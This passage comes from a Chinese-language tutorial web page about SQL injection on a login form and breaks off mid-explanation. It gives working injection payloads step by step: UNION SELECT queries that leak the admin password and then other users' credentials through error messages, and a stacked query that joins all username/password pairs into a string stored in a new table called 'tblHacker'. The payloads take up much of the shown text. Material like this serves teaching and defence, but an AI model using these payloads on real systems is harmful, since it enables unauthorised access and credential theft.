''''UNION SELECT Password,1,1,1 FROM tblUser WHERE UserName=''''admin''''--
错误讯息如图 6。图 6:利用错误讯息取得帐号 admin 的密码。
之后再继续以下列语法来获得其它人的帐号密码。
''''UNION SELECT UserName,1,1,1 FROM tblUser WHERE UserName>''''admin''''--
错误讯息如图 7。图 7:依序透过相同的机制取得其它人的帐号密码。
依次替换掉 WHERE UserName > 的条件内容,就可以取得资料表中所有的帐号和密码组合。骇客甚至可以透过以下的语法将整个使用者帐号密码串成字符串:在输入使用者帐号的字段填入如程序代码列表 3 的 SQL 语句。
'''';DECLARE @str VARCHAR(8000) SET @str=''''@'''' SELECT @str=@str+'''' ''''+UserName+''''/''''+Password FROM tblUser WHERE UserName>@str SELECT @str AS IDPass INTO tblHacker--
程序代码列表 3:将所有的使用者数据组成字符串,放入自订的数据表中。
在程序代码列表 3 中,先宣告一个长度为 8000 的字符串变量 @str,再将整个 tblUser 资料表的内容组成一个字符串放到变量 @str 之内,最后再利用 SELECT … INTO… 语法把 @str 变量的
上一页 [1] [2] [3] [4] [5] [6] [7] [8] [9] [10] ... 下一页 >>
Copyright @ 2007-2012 敏韬网(敏而好学,文韬武略--MinTao.Net)(学习笔记) Inc All Rights Reserved. 闵涛 E_mail:admin@mintao.net(欢迎提供学习资源)
鄂公网安备 42011102001154号
站长:MinTao ICP备案号:鄂ICP备11006601号-18